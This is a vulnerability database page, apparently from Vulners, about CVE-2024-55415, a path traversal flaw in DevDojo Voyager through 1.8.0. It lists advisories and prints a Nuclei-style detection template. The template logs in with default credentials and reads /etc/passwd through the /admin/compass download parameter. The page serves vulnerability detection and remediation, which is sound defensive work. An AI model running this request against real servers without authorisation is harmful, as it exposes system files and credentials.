| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| The vulnerability of the Voyager PHP framework Laravel, related to errors in handling relative pathnames to directories, allows attackers to compromise the confidentiality, integrity, and accessibility of protected information. | 31 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-55415 | 29 Jan 202519:36 | – | circl | |
| Voyager 安全漏洞 | 30 Jan 202500:00 | – | cnnvd | |
| CVE-2024-55415 | 30 Jan 202500:00 | – | cve | |
| CVE-2024-55415 | 30 Jan 202500:00 | – | cvelist | |
| DevDojo Voyager vulnerable to path traversal | 30 Jan 202515:31 | – | github | |
| CVE-2024-55415 | 30 Jan 202515:15 | – | nvd | |
| GHSA-J63M-2VR6-FV7M DevDojo Voyager vulnerable to path traversal | 30 Jan 202515:31 | – | osv | |
| PT-2025-1308 | 30 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-55415 | 23 May 202507:41 | – | redhatcve |
id: CVE-2024-55415
info:
name: DevDojo Voyager <=1.8.0 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
impact: |
Authenticated attackers can exploit path traversal to read arbitrary files from the server, potentially exposing sensitive configuration files, credentials, and application source code.
remediation: |
Update DevDojo Voyager to version 1.8.1 or later to address the path traversal vulnerability.
reference:
- https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
- https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L213
- https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44
- https://nvd.nist.gov/vuln/detail/CVE-2024-55415
classification:
cve-id: CVE-2024-55415
epss-score: 0.14586
epss-percentile: 0.96231
metadata:
verified: true
max-request: 4
shodan-query: title:"Voyager"
tags: cve,cve2024,devdojo,voyager,lfr,lfi,vuln
variables:
username: "[email protected]"
password: "password"
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: csrf
group: 1
regex:
- 'name="_token" value="([a-zA-Z0-9]+)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_token={{csrf}}&email={{username}}&password={{password}}&
matchers:
- type: dsl
dsl:
- "contains(body,'/admin</title>')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- status_code == 200
condition: and
# digest: 4b0a004830460221009c853d633bac8185b7266cffc1cc27cbcfaa517cb44e601e7273c3c642a91e6c022100eddfb2138367c54eeb28ffdde14205f3e7d92f19e087eed45d21bf8453c182f9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation